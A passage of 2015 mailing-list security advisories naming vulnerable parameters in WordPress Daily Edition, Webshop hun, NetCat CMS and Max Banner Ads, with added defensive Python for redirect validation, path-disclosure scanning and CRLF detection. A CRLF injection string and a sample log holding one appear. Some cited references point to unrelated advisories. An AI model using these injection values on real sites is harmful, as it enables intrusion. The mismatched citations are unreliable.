http://www.inzeed.com/kaleidoscope/computer-web-security/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
https://infoswift.wordpress.com/2015/03/14/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142527148510581&w=4
http://en.hackdig.com/wap/?id=17054


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

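Added example, not WebPAC Pro's code: a validator for a redirect target such as the showres url parameter that re-emits only a same-site path and falls back to "/" for foreign hosts, protocol-relative and backslash forms, userinfo tricks and non-HTTP schemes. The allowed host name is a constructed assumption.

```python
# Added example, not WebPAC Pro's code. It validates a redirect target such as
# the showres url parameter so that only paths on the site itself (or on an
# explicit allow-list of hosts) are followed; everything else falls back to "/".
# The allowed host name is constructed.
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"catalog.example.edu"}  # constructed: the catalogue's own host


def safe_redirect_target(url: str, fallback: str = "/") -> str:
    """Return a same-site redirect target derived from url, or fallback."""
    if not url:
        return fallback
    # Drop control characters and surrounding whitespace; browsers ignore them
    # when parsing, so "\tHTTPS://..." would otherwise slip past a prefix check.
    cleaned = "".join(ch for ch in url if ch.isprintable()).strip()
    # Browsers treat a backslash like a slash, so "/\host" is protocol-relative.
    normalised = cleaned.replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme:
        if parts.scheme not in ("http", "https"):
            return fallback  # data:, ftp:, javascript: and friends
        if parts.hostname not in ALLOWED_HOSTS:
            # hostname ignores any user@ prefix, so "https://good@other/"
            # is judged by "other", not by "good".
            return fallback
    elif parts.netloc:
        return fallback  # "//other.host/..." is protocol-relative
    elif not parts.path.startswith("/"):
        return fallback  # relative to the current page: ambiguous, refuse
    # Re-emit as path + query + fragment only, so no scheme, host or
    # credentials from the input reach the Location header. Collapsing the
    # leading slashes stops "//host" hiding inside the path component.
    path = "/" + parts.path.lstrip("/")
    return urlunsplit(("", "", path, parts.query, parts.fragment))
```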

[FD] WordPress Daily Edition Theme v1.6.2 Information Leakage Security Vulnerabilities

2015-03-10 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 Information Leakage Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme /thumb.php src Parameters
Information Leakage Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.*   v1.5.*   v1.4.*   v1.3.*   v1.2.*   v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
WooThemes



*Product & Vulnerable Versions:*
WordPress Daily Edition Theme
version 1.6.7
version 1.6.6
version 1.6.5
version 1.6.4
version 1.6.3
version 1.6.2
version 1.6.1
version 1.6
version 1.5
version 1.4.11
version 1.4.10
version 1.4.9
version 1.4.8
version 1.4.7
version 1.4.6
version 1.4.5
version 1.4.4
version 1.4.3
version 1.4.2
version 1.4.1
version 1.4.0
version 1.3.2
version 1.3.1
version 1.3
version 1.2.1
version 1.2
version 1.1.2
version 1.1.1
version 1.1
version 1.0.12
version 1.0.11
version 1.0.10
version 1.0.9
version 1.0.8
version 1.0.7
version 1.0.6
version 1.0.5
version 1.0.4
version 1.0.3
version 1.0.2
version 1.0.1
version 1.0



*Vendor URL & buy:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/
http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt



*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management."

"Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"


*(2) Vulnerability Details:*
WordPress Daily Edition Theme has a web application security bug problem.
It can be exploited by information leakage attacks - Full Path Disclosure
(FPD). This may allow a remote attacker to disclose the software's
installation path. While such information is relatively low risk, it is
often useful in carrying out additional, more focused attacks.


*(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameter.


*References:*
http://tetraph.com/security/information-leakage-vulnerability/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162_10.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
https://cxsecurity.com/issue/WLB-2015020093


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious


[FD] Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD) Security Vulnerabilities

2015-03-07 Thread Jing Wang
*Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD)
Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php termid parameter Information
Leakage Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: March 07, 2015
Latest Update: March 07, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Webshop hun


*Product & Version:*
Webshop hun
v1.062S


*Vendor URL & Download:*
Webshop hun can be bought from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product sell web application system.

"If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

"The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away."


*(2) Vulnerability Details:*
Webshop hun web application has a security bug problem. It can be exploited
by Information Leakage attacks. This may allow a remote attacker to
disclose the software's installation path. While such information is
relatively low risk, it is often useful in carrying out additional, more
focused attacks.



*(2.1)* The code flaw occurs at "index.php?" page with "termid" parameter.
Attackers can get information such as the server software installation path,
etc.


*References:*
http://tetraph.com/security/information-leakage-vulnerability/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-information-leakage.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/webshop-hun-v1-062s-information-leakage-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/26
http://packetstormsecurity.com/files/130648/Webshop-Hun-1.062S-Cross-Site-Scripting.html


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

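Added example covering the three Full Path Disclosure advisories above (724CMS, the Daily Edition theme and Webshop hun), not code from any of those vendors: it scans response bodies for PHP error output that names a file path, derives what an observer learns from it, and checks the php.ini values that keep such detail out of responses. The response body and settings are constructed assumptions.

```python
# Added example, not code from 724CMS, WooThemes or Webshop hun. It scans HTTP
# response bodies for PHP error output that reveals the installation path (the
# Full Path Disclosure described in the advisories above), works out what an
# observer learns from it, and checks php.ini values that stop the leak.
# The response body and settings are constructed.
import re

# PHP's default error line, plain or with html_errors=On (<b>...</b> wrapping):
#   Warning: include(x.php): failed to open stream ... in /var/www/app/index.php on line 12
PHP_ERROR = re.compile(
    r"(?:Warning|Notice|Fatal error|Parse error|Deprecated)(?:</b>)?\s*:\s*.*?"
    r"\bin\s+(?:<b>)?(?P<path>/[^\s<>\"']+|[A-Za-z]:\\[^\s<>\"']+)(?:</b>)?"
    r"\s+on line\s+(?:<b>)?(?P<line>\d+)",
    re.S,
)


def find_path_disclosures(body: str) -> list:
    """Return (path, line) for every PHP error message in body that names a file."""
    return [(m.group("path"), int(m.group("line"))) for m in PHP_ERROR.finditer(body)]


def install_root(paths: list) -> str:
    """Longest common directory of the leaked file paths: what the observer
    learns about the install location. Handles both / and \\ separators."""
    if not paths:
        return ""
    split = [re.split(r"[\\/]", p)[:-1] for p in paths]  # drop the file name
    common = []
    for parts in zip(*split):
        if len(set(parts)) != 1:
            break
        common.append(parts[0])
    sep = "\\" if "\\" in paths[0] else "/"
    return sep.join(common)


# php.ini values that keep error detail out of responses while still logging it.
HARDENED_PHP_INI = {"display_errors": "Off", "log_errors": "On", "html_errors": "Off"}


def php_ini_findings(settings: dict) -> list:
    """Names of settings whose value differs from HARDENED_PHP_INI."""
    return [key for key, want in HARDENED_PHP_INI.items()
            if str(settings.get(key, "")).lower() != want.lower()]


# Constructed response body: two errors leaked by a missing language file.
SAMPLE_BODY = (
    "<br />\n<b>Warning</b>:  include(lang/xx.php): failed to open stream: "
    "No such file or directory in <b>/var/www/html/cms/index.php</b> on line <b>12</b><br />\n"
    "<br />\n<b>Notice</b>:  Undefined index: termid in "
    "<b>/var/www/html/cms/inc/product.php</b> on line <b>48</b><br />\n"
)
```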


[FD] NetCat CMS Multiple HTTP Response Splitting (CRLF) Security Vulnerabilities

2015-03-07 Thread Jing Wang
*NetCat CMS Multiple HTTP Response Splitting (CRLF) Security
Vulnerabilities*


Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF
Injection') [CWE-93]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be got from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."


*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker
to insert arbitrary HTTP headers, which are included in a response sent to
the server. If an application does not properly filter such a request, it
could be used to inject additional headers that manipulate cookies,
authentication status, or more.

*(2.1)* The first code flaw occurs at "/post.php" page with "redirect_url"
parameter by adding "%0d%0a%20".

*(2.2)* The second code flaw occurs at "redirect.php?" page with "url"
parameter by adding "%0d%0a%20".


*References:*
http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html
http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/8
http://packetstormsecurity.com/files/130584/NetCat-CMS-5.01-Open-Redirect.html


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

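Added example, not NetCat CMS code: a Location-header builder that refuses CR/LF in the redirect target (the redirect_url and url parameters the advisory names), the unchecked pattern shown beside it so the extra header line is visible to a client-side parser, and an access-log check that flags query strings decoding to CR/LF. The log lines and header name are constructed assumptions.

```python
# Added example, not NetCat CMS code. It shows a Location-header builder that
# refuses CR/LF in the redirect target (the redirect_url and url parameters
# named in the advisory), what an unchecked header() call would emit, and a
# log check for encoded CR/LF in query strings. Log lines are constructed.
import re
from urllib.parse import unquote, urlsplit

CTL = re.compile(r"[\r\n\x00]")  # characters that end or corrupt a header line


def build_location_header(target: str) -> str:
    """Return 'Location: <target>' or raise ValueError if target carries a
    control character. The value is checked as the application receives it,
    i.e. after the server has percent-decoded %0d%0a from the query string."""
    if CTL.search(target):
        raise ValueError("control character in redirect target")
    return "Location: " + target


def rejects_target(target: str) -> bool:
    """True when build_location_header refuses target (used by the checks below)."""
    try:
        build_location_header(target)
    except ValueError:
        return True
    return False


def naive_response(target: str) -> str:
    """The defective pattern: the decoded parameter goes straight into the
    response head, so a CR LF inside it starts a new header line."""
    return ("HTTP/1.1 302 Found\r\nLocation: " + target
            + "\r\nContent-Length: 0\r\n\r\n")


def header_names(raw_response: str) -> list:
    """Header names a client would see, parsed from a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_crlf_requests(log_lines: list) -> list:
    """Return (client_ip, request_target) for access-log lines whose query
    string decodes to a CR, LF or NUL."""
    hits = []
    for line in log_lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        client_ip, target = match.groups()
        if CTL.search(unquote(urlsplit(target).query)):
            hits.append((client_ip, target))
    return hits


# Constructed access-log sample in combined log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Mar/2015:10:01:02 +0000] "GET /redirect.php?url=%2Fhome HTTP/1.1" 302 0',
    '203.0.113.9 - - [07/Mar/2015:10:01:07 +0000] "GET /redirect.php?url=%2Fhome%0d%0a%20extra HTTP/1.1" 302 0',
    '198.51.100.2 - - [07/Mar/2015:10:02:00 +0000] "GET /post.php?redirect_url=%2Fthanks HTTP/1.1" 302 0',
]
```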


[FD] WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities

2015-03-07 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src
Parameter Unrestricted Upload of File Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
[CWE-434]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
WooThemes



*Product & Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL & Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management."

"Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"


*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem.
It can be exploited by "Unrestricted Upload of File" (Arbitrary File
Uploading) attacks. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote or local
host. This may allow disclosing file contents or executing files like PHP
scripts. Such attacks are limited due to the script only calling files
already on the target host.


*(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameter.


*References:*
http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/4
http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities

2015-03-07 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 SQL Injection Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id
Parameters SQL Injection Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*



*Vendor:*
WooThemes



*Product & Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL & Download:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management."

"Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"







*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem.
It can be exploited by SQL Injection attacks. This may allow a remote
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.


*(2.1)* The code flaw occurs at "fiche-disque.php?" page with "&id"
parameter.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/27
http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts


[FD] Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-04 Thread Jing Wang
*Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php Multiple Parameters XSS
Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Webshop hun


*Product & Version:*
Webshop hun
v1.062S


*Vendor URL & Download:*
Webshop hun can be downloaded from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product selling web application system.

"If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

"The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away."





*(2) Vulnerability Details:*
Webshop hun has a web application security bug problem. It can be exploited
by XSS (Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at "index.php?" page with "param", "center",
"lap", "termid" and "nyelv_id" parameters.






*References:*
http://tetraph.com/security/xss-vulnerability/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] WordPress "Max Banner Ads" Plug-in XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-04 Thread Jing Wang
*WordPress "Max Banner Ads" Plug-in XSS (Cross-site Scripting) Security
Vulnerabilities*


Exploit Title: Wordpress "Max Banner Ads" Plugin /info.php &zone_id
Parameter XSS Security Vulnerabilities
Product: Wordpress "Max Banner Ads" Plugin
Vendor: MaxBlogPress
Vulnerable Versions: 1.9  1.8   1.4   1.3.*   1.2.*   1.1   1.09
Tested Version: Check All Related Versions' Source Code
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MaxBlogPress


*Product & Version:*
Wordpress "Max Banner Ads" Plugin
1.9   1.8   1.4   1.3.7   1.3.6   1.3.5   1.3.4   1.3.3   1.3.2   1.3.1   1.3   1.2.7   1.2.6   1.2.5   1.2   1.1   1.09



*Vendor URL & Download:*
Wordpress "Max Banner Ads" Plugin can be downloaded from here,
http://www.maxblogpress.com/plugins/


*Product Introduction:*
"Easily add and rotate banners in your wordpress blog anywhere you like
without editing any themes or touching any codes"





*(2) Vulnerability Details:*
Wordpress "Max Banner Ads" Plugin has a web application security bug
problem. It can be exploited by XSS (Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at "info.php?" page with "zone_id"
parameter.







*References:*
http://tetraph.com/security/xss-vulnerability/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-max-banner-ads-plug-in-xss.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] NetCat CMS Multiple URL Redirection (Open Redirect) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Multiple URL Redirection (Open Redirect) Security
Vulnerabilities*



Exploit Title: NetCat CMS Multiple URL Redirection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
